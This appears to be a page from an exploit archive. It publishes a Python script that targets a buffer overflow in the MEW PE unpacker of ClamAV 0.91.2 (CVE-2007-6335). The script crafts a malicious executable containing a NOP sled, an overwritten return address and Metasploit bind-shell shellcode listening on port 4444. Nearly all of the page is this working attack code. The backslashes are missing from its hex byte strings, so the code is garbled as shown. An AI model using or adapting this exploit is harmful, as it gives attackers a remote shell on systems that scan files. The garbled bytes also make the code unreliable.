ClamAV 0.91.2 libclamav MEW PE Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ClamAV 0.91.2 libclamav MEW PE Buffer Overflow Exploit
# Published : 2008-01-07
# Author : Thomas Pollet
# Previous Title : Xtacacsd <= 4.1.2 report Buffer Overflow
# Next Title : MySQL <=6.0 yaSSL <= 1.7.5 Hello Message Buffer Overflow

''' 
 
 clamav-0.91.2 exploit ( CVE-2007-6335 )
 (c) Thomas Pollet thomas.pollet@gmail.com

 we own dsize in 
 read(desc, src + dsize, exe_sections[i + 1].rsz)) != exe_sections[i + 1].rsz)
 exploited with randomize_va_space = 0
 
'''

import struct

exe=(
"x4dx5ax00x00x00x00x00x00x00x00x00x00x50x45x00x00x4cx01x02x00"
"x00x00x00x00x00x00x00x00x00x00x00x00xe0x00x0fx01x0bx01x00x00"
"x00x02x00x00x00x00x00x00x00x00x00x00x06x53x00x00x00x10x00x00"
"x0cx00x00x00x00x00x40x00x00x10x00x00x00x02x00x00x04x00x00x00"
"x00x00x00x00x04x00x00x00x00x00x00x00x00x60x00x00x00x02x00x00"
"x00x00x00x00x05x00x00x00x00x00x20x00x00x10x00x00x00x00x10x00"
"x00x10x00x00x00x00x00x00x10x00x00x00x00x00x00x00x00x00x00x00"
"x0bx53x00x00x15x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x4dx45x57x00x46x12xd2xc3xffxfa"
"DSIZE"
"x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xe0x00x00xc0"
"x02xd2x75xdbx8ax16xebxd4"
"SSIZE"
"x00x50x00x00xffxffxffx00"
"x00x02x00x00x00x00x00x00x00x00x00x00x00x00x00x00xe0x00x00xc0"
"xbex1cx50x40x00x8bxdexadxadx50xadx97xb2x80xa4xb6x80xffx13x73"
"xf9x33xc9xffx13x73x16x33xc0xffx13x73x21xb6x80x41xb0x10xffx13"
"x12xc0x73xfax75x3exaaxebxe0xe8x76x4ex00x00x02xf6x83xd9x01x75"
"x0exffx53xfcxebx26xacxd1xe8x74x2fx13xc9xebx1ax91x48xc1xe0x08"
"xacxffx53xfcx3dx00x7dx00x00x73x0ax80xfcx05x73x06x83xf8x7fx77"
"x02x41x41x95x8bxc5xb6x00x56x8bxf7x2bxf0xf3xa4x5exebx9bxadx85"
"xc0x75x90xadx96xadx97x56xacx3cx00x75xfbxffx53xf0x95x56xadx0f"
"xc8x40x59x74xecx79x07xacx3cx00x75xfbx91x40x50x55xffx53xf4xab"
"x85x01x75xe5xc3x00x00x00x00x00x00x00"
"COPYSIZE"
"CRAP"
"x73x00xe9x49xaexffxffx0cx50x00x00x00x00x00x00x00"
"x00x00x00xddx52x00x00x0cx50x00x00")

shellcode= ( #linux_ia32_bind -  LPORT=4444 Size=84 Encoder=None http://metasploit.com */
"x31xdbx53x43x53x6ax02x6ax66x58x99x89xe1xcdx80x96"
"x43x52x66x68x11x5cx66x53x89xe1x6ax66x58x50x51x56"
"x89xe1xcdx80xb0x66xd1xe3xcdx80x52x52x56x43x89xe1"
"xb0x66xcdx80x93x6ax02x59xb0x3fxcdx80x49x79xf9xb0"
"x0bx52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53"
"x89xe1xcdx80"
)

exe = exe.replace("DSIZE",struct.pack('<L',0x01010000 | 0xb67b))#dsize
exe = exe.replace("SSIZE",struct.pack('<L',0x49838da9 + 0x7000 ))
exe = exe.replace("COPYSIZE",struct.pack('<L',0xf7070707 ))
exe = exe.replace("CRAP","A"*768)

exe+="a" #alignment
exe+=struct.pack('<L', 0xbfff9010 ) * 16000 #return address
exe+="x90"* 0x4000
exe+=shellcode

fout = open("exploit.exe","w")
fout.write(exe)
fout.close()

# www.Syue.com [2008-01-07]